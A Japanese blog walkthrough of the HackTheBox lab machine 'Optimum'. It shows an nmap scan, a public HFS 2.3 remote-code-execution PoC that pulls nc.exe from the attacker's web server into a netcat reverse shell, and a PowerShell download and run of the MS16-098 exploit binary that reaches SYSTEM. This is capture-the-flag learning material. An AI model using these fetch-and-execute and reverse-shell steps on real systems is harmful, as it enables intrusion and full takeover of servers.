HackTheBox Optimum Walkthrough
https://app.hackthebox.eu/machines/Optimum
お久しぶりです。ネスペ受けて午後1で爆死したりしてました...
今回はHackTheBox OptimumのWalkthrough書きます。
権限昇格うまく行かなかったとき、アイコンがダブルピースなのを見てイラッとくるなど...笑
Userフラグは簡単だったが、rootはPoCで取るのが初めてだったので難しかった。
目次
ポートスキャン
普通にポートスキャンをする。一応autoreconもかけておく。
結果を見ると、80番が開いていて、HttpFileServer httpd2.3が動いていることが分かる。
OSはWindowsServer 2012 R2の可能性が高い。
┌──(kali㉿kali)-[~] └─$ sudo nmap -A 10.10.10.8 [sudo] kali のパスワード: Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-28 21:37 JST Nmap scan report for 10.10.10.8 Host is up (0.082s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 80.64 ms 10.10.14.1 2 80.65 ms 10.10.10.8 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 36.55 seconds
Webサーバの調査
普通にブラウザでアクセスしてみるとこんな感じ。
アップローダの画面が見える。
autoreconで引っかかったgobuster, nikto, whatwebの結果はいまいちだったので、
純粋にHFS httpd2.3の脆弱性を調べることにした。
PoCの実行
HFS httpd2.3のPoCを検索してみると、ExploitDBに面白そうなPoCを発見。
RCEができるPythonで書かれたPoCだった。
ただ、使うのにいくつか準備・注意事項があった。
- 事前に
/var/www/html
にnc.exe
を置いて、httpサーバを80番で立てておくこと - PoCのlocal addressとport番号を編集し、port番号にてncで待ち受けること
- PoCは一発で通らないかもしれないので、何回か実行すること
ncバイナリを公開ディレクトリに配置する。
今回は、Windows用のnc.exeを/usr/share/windows-binaries/nc.exe
からコピーして使う。
┌──(kali㉿kali)-[~/results/Optimum/scans] └─$ sudo cp /usr/share/windows-binaries/nc.exe /var/www/html/ [sudo] kali のパスワード: ┌──(kali㉿kali)-[~/results/Optimum/scans] └─$ ls /var/www/html index.html index.nginx-debian.html nc.exe
HTTPServerを公開ディレクトリで立てておく。ポートは80番。
┌──(kali㉿kali)-[/var/www/html] └─$ sudo python -m SimpleHTTPServer 80 [sudo] kali のパスワード Serving HTTP on 0.0.0.0 port 80 ...
netcatでリバースシェルを準備
┌──(kali㉿kali)-[~] └─$ nc -vlnp 1234 listening on [any] 1234 ...
いざ実行(複数回やって、リバースシェルの結果を見る)
┌──(kali㉿kali)-[~/Downloads] └─$ python 39161.py 10.10.10.8 80
ひっかかった。やったね。
──(kali㉿kali)-[~] └─$ nc -vlnp 1234 listening on [any] 1234 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.8] 49194 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>
すでにユーザディレクトリに入っていた。Userフラグ発見。
C:\Users\kostas\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is D0BC-0196 Directory of C:\Users\kostas\Desktop 05/05/2021 01:00 �� <DIR> . 05/05/2021 01:00 �� <DIR> .. 18/03/2017 03:11 �� 760.320 hfs.exe 18/03/2017 03:13 �� 32 user.txt.txt 2 File(s) 760.352 bytes 2 Dir(s) 31.860.166.656 bytes free C:\Users\kostas\Desktop>type user.txt.txt
権限昇格しないとrootが取れない...
C:\Users\kostas\Desktop>whoami whoami optimum\kostas C:\Users>cd Administrator cd Administrator Access is denied.
権限昇格
今回はmetasploit使ってない、どうするの、ということで調べたところ、
便利なツールを発見した。
Windows-Exploit-Suggester
と言ってsysteminfo
の結果を与えると、
その結果と脆弱性のデータを突合し、おすすめのPoCを教えてくれる。
Python2で動作確認済み。ただ使うときにやや癖があった。
このツール、xlsxファイル(脆弱性のデータ)を読み込むために、Pythonのxlrd
ライブラリが必要だが、
xlrdの最新版はxlsxをサポートしていないため、xlrdをver1.1.0に落とさないと動かない...
ツールを使うため、xlrdを入れる
┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master] └─$ pip install xlrd --upgrade 2 ⨯ Requirement already satisfied: xlrd in /usr/lib/python3/dist-packages (1.2.0) Collecting xlrd Downloading xlrd-2.0.1-py2.py3-none-any.whl (96 kB) |████████████████████████████████| 96 kB 4.5 MB/s Installing collected packages: xlrd Successfully installed xlrd-2.0.1
そしてxlrdを1.1.0へダウングレードする
┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master] └─$ pip2 install xlrd==1.1.0 1 ⨯ Defaulting to user installation because normal site-packages is not writeable Collecting xlrd==1.1.0 Downloading xlrd-1.1.0-py2.py3-none-any.whl (103 kB) |████████████████████████████████| 103 kB 5.8 MB/s Installing collected packages: xlrd Attempting uninstall: xlrd Found existing installation: xlrd 2.0.1 Uninstalling xlrd-2.0.1: Successfully uninstalled xlrd-2.0.1 Successfully installed xlrd-1.1.0
脆弱性データのアップデートをする(DBの内容はxlsファイルとして出てくる)
┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master] └─$ python windows-exploit-suggester.py --update [*] initiating winsploit version 3.3... [+] writing to file 2021-04-28-mssb.xls [*] done
Optimumで、systeminfo
コマンドを実行し、それテキストファイルにしておく。
C:\Users\kostas\Desktop>systeminfo systeminfo Host Name: OPTIMUM OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA535 Original Install Date: 18/3/2017, 1:51:36 �� System Boot Time: 5/5/2021, 12:59:00 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest Total Physical Memory: 4.095 MB Available Physical Memory: 3.394 MB Virtual Memory: Max Size: 5.503 MB Virtual Memory: Available: 4.841 MB Virtual Memory: In Use: 662 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: \\OPTIMUM Hotfix(s): 31 Hotfix(s) Installed. [01]: KB2959936 [02]: KB2896496 [03]: KB2919355 [04]: KB2920189 [05]: KB2928120 [06]: KB2931358 [07]: KB2931366 [08]: KB2933826 [09]: KB2938772 [10]: KB2949621 [11]: KB2954879 [12]: KB2958262 [13]: KB2958263 [14]: KB2961072 [15]: KB2965500 [16]: KB2966407 [17]: KB2967917 [18]: KB2971203 [19]: KB2971850 [20]: KB2973351 [21]: KB2973448 [22]: KB2975061 [23]: KB2976627 [24]: KB2977629 [25]: KB2981580 [26]: KB2987107 [27]: KB2989647 [28]: KB2998527 [29]: KB3000850 [30]: KB3003057 [31]: KB3014442 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.8 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
準備ができたので、やっとWindows-Exploit-Suggesterを実行...
ここで1時間は溶かした...つかれた...
Python2系で動かす ┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master] └─$ python windows-exploit-suggester.py --database 2021-04-28-mssb.xls --systeminfo optimum_systeminfo.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits [*] there are now 246 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2012 R2 64-bit' [*] [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135) [*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) [*] https://github.com/tinysec/public/tree/master/CVE-2016-7255 [*] [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important [*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) [*] [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important [*] https://github.com/foxglovesec/RottenPotato [*] https://github.com/Kevin-Robertson/Tater [*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege [*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation [*] [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important [*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC [*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC [*] [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical [*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC [*] [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important [*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC [*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC [*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#) [*] [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important [*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC [*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC [*] [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important [*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC [*] [E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important [*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC [*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC [*] [E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important [*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC [*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC [*] [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical [*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) [*] [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important [*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC [*] [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important [*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC [*] [E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical [*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC [*] [M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical [*] https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow [*] [E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important [*] https://www.exploit-db.com/exploits/37052/ -- Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052), PoC [*] [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important [*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC [*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF [*] [E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical [*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC [*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC [*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC [*] [E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important [*] http://www.exploit-db.com/exploits/35661/ -- Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl), PoC [*] [E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical [*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC [*] [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC [*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF [*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF [*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important [*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC [*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF [*] [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical [*] done
いっぱいおすすめされたが、上から試した結果、MS16-098
のPoCで権限昇格を狙うことにした。
このPoCはC言語で書いてあるので、本当はコンパイルが必要だが、
PoCのコメントに実行可能なバイナリファイルの場所が書いてあったので、ありがたく落とす。
そしてOptimumに転送するため、公開ディレクトリに置いてOptimumからダウンロードさせる。
┌──(kali㉿kali)-[/var/www/html] └─$ sudo wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe -o 41020.exe [sudo] kali のパスワード: ┌──(kali㉿kali)-[/var/www/html] └─$ sudo chmod 755 41020.exe ┌──(kali㉿kali)-[/var/www/html] └─$ ls 41020.exe index.html index.nginx-debian.html nc.exe ┌──(kali㉿kali)-[/var/www/html] └─$ sudo python -m SimpleHTTPServer 80 [sudo] kali のパスワード: Serving HTTP on 0.0.0.0 port 80 ...
powershell経由でwgetコマンドを使い、PoCをOptimumにダウンロードする。
その後、PoCを実行すると、権限昇格ができた。
C:\Users\kostas\Desktop>powershell wget http://10.10.14.2/41020.exe -outfile 41020.exe powershell wget http://10.10.14.2/41020.exe -outfile 41020.exe C:\Users\kostas\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is D0BC-0196 Directory of C:\Users\kostas\Desktop 05/05/2021 02:42 �� <DIR> . 05/05/2021 02:42 �� <DIR> .. 05/05/2021 02:42 �� 1.988 41020.exe 18/03/2017 03:11 �� 760.320 hfs.exe 18/03/2017 03:13 �� 32 user.txt.txt 3 File(s) 762.340 bytes 2 Dir(s) 31.896.416.256 bytes free C:\Users\kostas\Desktop>41020.exe 41020.exe Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>whoami whoami nt authority\system
rootフラグ発見。
C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is D0BC-0196 Directory of C:\Users\Administrator\Desktop 18/03/2017 03:14 �� <DIR> . 18/03/2017 03:14 �� <DIR> .. 18/03/2017 03:14 �� 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 31.883.894.784 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt